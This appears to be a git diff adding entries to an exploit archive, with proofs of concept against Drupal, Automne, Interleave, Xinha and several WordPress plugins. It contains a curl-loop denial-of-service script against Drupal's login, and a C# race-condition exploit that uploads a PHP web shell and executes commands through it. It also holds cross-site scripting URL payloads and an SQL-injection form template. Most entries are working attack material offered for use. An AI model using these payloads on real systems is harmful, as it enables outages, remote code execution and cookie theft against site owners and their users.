index 000000000..18b051111
--- /dev/null
+++ b/platforms/php/webapps/35415.txt
@@ -0,0 +1,53 @@
+====================================================================
+DESCRIPTION:
+====================================================================
+A vulnerability present in Drupal < 7.34 allows an attacker to send
+specially crafted requests resulting in CPU and memory exhaustion. This
+may lead to the site becoming unavailable or unresponsive (denial of
+service).
+
+====================================================================
+Time Line:
+====================================================================
+
+November 19, 2014 - A Drupal security update and the security advisory
+is published.
+
+====================================================================
+Proof of Concept:
+====================================================================
+
+Generate a pyaload and try with a valid user:
+
+echo -n "name=admin&pass=" > valid_user_payload && printf "%s"
+{1..1000000} >> valid_user_payload && echo -n "&op=Log
+in&form_id=user_login" >> valid_user_payload
+
+Perform a Dos with a valid user:
+
+for i in `seq 1 150`; do (curl --data @valid_user_payload
+http://yoursite/drupal/?q=user --silent > /dev/null &); sleep 0.5; done
+
+
+====================================================================
+Authors:
+====================================================================
+
+-- Javer Nieto -- http://www.behindthefirewalls.com
+-- Andres Rojas -- http://www.devconsole.info
+
+====================================================================
+References:
+====================================================================
+
+* https://wordpress.org/news/2014/11/wordpress-4-0-1/
+
+* https://www.drupal.org/SA-CORE-2014-006
+
+*
+http://www.behindthefirewalls.com/2014/11/wordpress-denial-of-service-responsible-disclosure.html
+
+*
+http://www.behindthefirewalls.com/2014/11/drupal-denial-of-service-responsible-disclosure.html
+
+* http://www.devconsole.info/?p=1050
diff --git a/platforms/php/webapps/35416.txt b/platforms/php/webapps/35416.txt
new file mode 100755
index 000000000..68e082f24
--- /dev/null
+++ b/platforms/php/webapps/35416.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/46771/info
+
+Interleave is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Interleave 5.5.0.2 is vulnerable; other versions may also be affected.
+
+http://www.example.com/interleave-5.5.0.2-stable-20110227/basicstats.php?AjaxHandler=0<script>alert(0)<%2fscript>&e=1<script>alert(0)<%2fscript>&eid=2<script>alert(0)<%2fscript>&id=3<script>alert(0)<%2fscript>&recordid=4<script>alert(0)<%2fscript>&templateid=5<script>alert(0)<%2fscript>&fileid=6<script>alert(0)<%2fscript>&tid=7<script>alert(0)<%2fscript>&username=8<script>alert(0)<%2fscript>&password=9<script>alert(0)<%2fscript>&repository=10<script>alert(0)<%2fscript>&GetCSS=11<script>alert(0)<%2fscript>&GetjQueryUiPlacementJS=12<script>alert(0)<%2fscript>&ShowEntityList=13<script>alert(0)<%2fscript>&ShowTable=14<script>alert(0)<%2fscript>&nonavbar=15<script>alert(0)<%2fscript>&tab=16<script>alert(0)<%2fscript>&CT=17<script>alert(0)<%2fscript>
diff --git a/platforms/php/webapps/35417.php b/platforms/php/webapps/35417.php
new file mode 100755
index 000000000..bcb337538
--- /dev/null
+++ b/platforms/php/webapps/35417.php
@@ -0,0 +1,145 @@
+source: http://www.securityfocus.com/bid/46774/info
+
+Automne is prone to an arbitrary-file-upload vulnerability.
+
+An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.
+
+Automne 4.1.0 is vulnerable; other versions may also be affected. 
+
+Home Software Services Advisories Contact
+Automne 4.1.0 Race Condition
+
+// ------------------------------------------------------------------------
+// Software................Automne 4.1.0
+// Vulnerability...........Race Condition
+// Threat Level............Very Critical (5/5)
+// Download................http://en.automne-cms.org/
+// Release Date............3/6/2011
+// Tested On...............Windows Vista + XAMPP
+// ------------------------------------------------------------------------
+// Author..................AutoSec Tools
+// Site....................http://www.autosectools.com/
+// Email...................John Leitch <john@autosectools.com>
+// ........................Bryce Darling <bryce@autosectools.com>
+// ------------------------------------------------------------------------
+// 
+// 
+// --Description--
+// 
+// A race condition in Automne 4.1.0 can be exploited to bypass
+// validation performed on uploaded files. The following proof of concept
+// uploads a PHP script and then attempts to execute it before it is deleted.
+// 
+// 
+// --PoC--
+
+using System;
+using System.Collections.Generic;
+using System.Text;
+using System.Threading;
+using System.Diagnostics;
+using System.Net.Sockets;
+
+namespace RaceConditionExploit
+{
+    class Program
+    {
+        static bool trying = true;
+
+        static void SendReq(string req)
+        {
+            try
+            {
+                var bytes = ASCIIEncoding.ASCII.GetBytes(req);
+                var client = new TcpClient();
+                client.Connect("localhost", 80);
+                using (var stream = client.GetStream())
+                    stream.Write(bytes, 0, bytes.Length);
+            }
+            catch (Exception ex)
+            {
+                Console.WriteLine(ex);
+            }
+        }
+
+        static void CheckForCalc()
+        {
+            if (Process.GetProcessesByName("calc").Length != 0)
+                trying = false;
+        }
+
+        static void Main()
+        {
+            
+
+            var resets = new[]
+            {
+                new ManualResetEvent(false),
+                new ManualResetEvent(false),
+                new ManualResetEvent(false),
+            };
+
+            ThreadPool.QueueUserWorkItem(x =>
+            {
+                resets[0].WaitOne();
+
+                while (trying)
+                {
+                    SendReq(@"POST /automne/automne/admin/upload-controler.php?atm-regen=shell.php HTTP/1.1
+Host: localhost
+Proxy-Connection: keep-alive
+User-Agent: x
+Content-Length: 193
+Cache-Control: max-age=0
+Origin: null
+Content-Type: multipart/form-data; boundary=----x
+Accept: text/html
+Accept-Encoding: gzip,deflate,sdch
+Accept-Language: en-US,en;q=0.8
+Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
+
+------x
+Content-Disposition: form-data; name=""Filedata""; filename=""shell.php""
+Content-Type: application/octet-stream
+
+<?php echo '<pre>' + system($_GET['CMD']) + '</pre>'; ?>
+------x--
+
+");
+                    CheckForCalc();                    
+                }
+                resets[1].Set();
+            });
+
+            ThreadPool.QueueUserWorkItem(x =>
+            {
+                resets[0].WaitOne();
+
+                while (trying)
+                {
+                    SendReq(@"GET http://localhost/automne/automne/upload/shell.php?CMD=calc.exe HTTP/1.1
+Host: localhost
+Connection: keep-alive
+Cache-Control: max-age=0
+User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.119 Safari/534.16
+Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+Accept-Encoding: gzip,deflate,sdch
+Accept-Language: en-US,en;q=0.8
+Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
+Cookie: PHPSESSID=poiued4lsn8im03kb80t6131n3; osclass=9aae23cu0mqtopjv126loiu9n6; AutomneSession=mo70c3rth2qboupjpfbo010gv0
+
+");
+                    CheckForCalc();
+                }
+
+                resets[2].Set();
+            });
+
+            resets[0].Set();
+
+            resets[1].WaitOne();
+            resets[2].WaitOne();
+        }
+    }
+}
+
diff --git a/platforms/php/webapps/35418.txt b/platforms/php/webapps/35418.txt
new file mode 100755
index 000000000..87d5b9a29
--- /dev/null
+++ b/platforms/php/webapps/35418.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/46781/info
+
+The Inline Gallery WordPress Plugin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Inline Gallery WordPress Plugin 0.3.9 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/wp-content/plugins/inline-gallery/browser/browser.php?do=%3Cscript%3Ealert%28%22XSS%22%29;%3C/script%3E
\ No newline at end of file
diff --git a/platforms/php/webapps/35429.txt b/platforms/php/webapps/35429.txt
new file mode 100755
index 000000000..34991e9e9
--- /dev/null
+++ b/platforms/php/webapps/35429.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/46782/info
+
+The PhotoSmash Galleries WordPress Plugin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+PhotoSmash Galleries WordPress Plugin 1.0.1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/wp-content/plugins/photosmash-galleries/index.php?action=%3Cscript%3Ealert%28%22XSS%22%29;%3C/script%3E
\ No newline at end of file
diff --git a/platforms/php/webapps/35430.txt b/platforms/php/webapps/35430.txt
new file mode 100755
index 000000000..524f075f2
--- /dev/null
+++ b/platforms/php/webapps/35430.txt
@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/46783/info
+
+1 Flash Gallery is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability.
+
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+1 Flash Gallery 0.2.5 is vulnerable; other versions may also be affected.
+
+http://www.example.com/wp-content/plugins/1-flash-gallery/folder.php?type=%22%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+
+<form action="http://[host]/wp-content/plugins/1-flash-gallery/massedit_album.php" method="post" name="main" >
+<input type="hidden" name="album_id" value="1" />
+<input type="hidden" name="images" value="1" />
+<input type="hidden" name="gall_id" value="SQL_CODE_HERE" />
+<input type="submit" value="submit" name="submit" />
\ No newline at end of file
diff --git a/platforms/php/webapps/35431.txt b/platforms/php/webapps/35431.txt
new file mode 100755
index 000000000..7295ce053
--- /dev/null
+++ b/platforms/php/webapps/35431.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/46794/info
+
+RuubikCMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+RuubikCMS 1.0.3 is vulnerable; other versions may also be affected.
+
+http://www.example.com/ruubikcms/cms/includes/head.php?cmspage=</title><script>alert(123);</script> 
\ No newline at end of file
diff --git a/platforms/php/webapps/35435.txt b/platforms/php/webapps/35435.txt
new file mode 100755
index 000000000..97b2714bb
--- /dev/null
+++ b/platforms/php/webapps/35435.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/46823/info
+
+The Lazyest Gallery WordPress Plugin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Lazyest Gallery WordPress Plugin 1.0.26 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/wp-content/plugins/lazyest-gallery/lazyest-popup.php?image=%3C/title%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
\ No newline at end of file
diff --git a/platforms/php/webapps/35436.txt b/platforms/php/webapps/35436.txt
new file mode 100755
index 000000000..e96030124
--- /dev/null
+++ b/platforms/php/webapps/35436.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/46825/info
+
+Xinha is prone to multiple HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+
+Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible.
+
+Xinha 0.96.1 is vulnerable; prior versions may also be affected. Note that applications that use vulnerable versions of Xinha may also be affected. 
+
+http://www.example.com/wikiwig5.01/_wk/Xinha/plugins/SpellChecker/spell-check-savedicts.php?to_r_list=%3Cscript%3Ealert(0)%3C%2fscript%3E
\ No newline at end of file